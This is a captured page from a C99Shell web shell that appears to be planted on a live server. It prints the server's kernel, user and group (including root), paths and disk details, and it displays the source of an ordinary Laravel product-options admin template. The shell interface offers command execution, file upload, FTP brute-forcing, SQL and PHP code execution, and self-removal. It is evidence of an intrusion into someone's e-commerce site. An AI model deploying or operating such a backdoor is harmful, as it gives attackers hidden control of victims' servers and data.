!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/resources/views/admin/product/tabs/   drwxr-xr-x
Free 28.71 GB of 117.98 GB (24.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     option.blade.php (2.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
  <input type="hidden" name="optionPost" id="optionPost" value="">
   <div class="row">
      <div class="col-md-3 mb-3 ">
        <select class="form-control" name="option[type][]" onchange="setOption(this)">
            <option value="">Select Option</option>
            @foreach($data['product_options'] as $key=>$value)
                @if(isset($value->productoptionDescription->name) && $value->productoptionDescription->name)
                    <option value="{{$value->id}}"
                            data-label="{{$value->productoptionDescription->name}}">{{$value->productoptionDescription->name}}</option>
                @endif
            @endforeach
        </select>
      </div>

        <div class="col-md-9 mb-2 " >
          <div class="table-responsive ">
          @foreach($data['product_options'] as $key=>$value)
              <table class="table align-items-center table-option table-flush d-none optionTable{{$value->id}}" data-optionID="{{$value->id}}" data-optionType="{{$value->type}}" id="counter_option_tb1{{$value->id}}" >
                  <thead>
                    <tr class="tr_option_clone">
                        <th>Label</th>
                        <th>Price</th>
                        @if($value->type == 'Color')
                          <th>Color Value</th>
                       @endif
                        <th></th>
                      </tr>
                  </thead>
                   <tbody class="list" >
                        <tr>
                          <td><input type="text" placeholder="Enter Label" name="option[{{$value->id}}][label][]" class="form-control" type="text" /></td>
                          <td><input type="number"   name="option[{{$value->id}}][price][]" class="form-control" type="text" placeholder="Enter Price" /></td>
                            @if($value->type == 'Color')
                              <td><input type="text"   name="option[{{$value->id}}][color_code][]" class="form-control" type="text" placeholder="Enter Color Name or Code" /></td>
                            @endif
                          <td>
                            <button class="btn btn-danger" type="button" id="DeleteOptionButton" ><icon class="fa fa-minus" /> </button>
                          </td>
                         </tr>

                </tr>
              </tbody>
            <tfoot>
              <tr>
                <td style="text-align:left" colspan="2">
                    <button type="button" class="btn btn-secondary addRowButton" id="addRowButton" ><icon class="fa fa-plus" /> Add Raw</button>
                </td>
            </tr>
            </tfoot>
        </table>
        @endforeach
        </div>
       </div>
    </div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--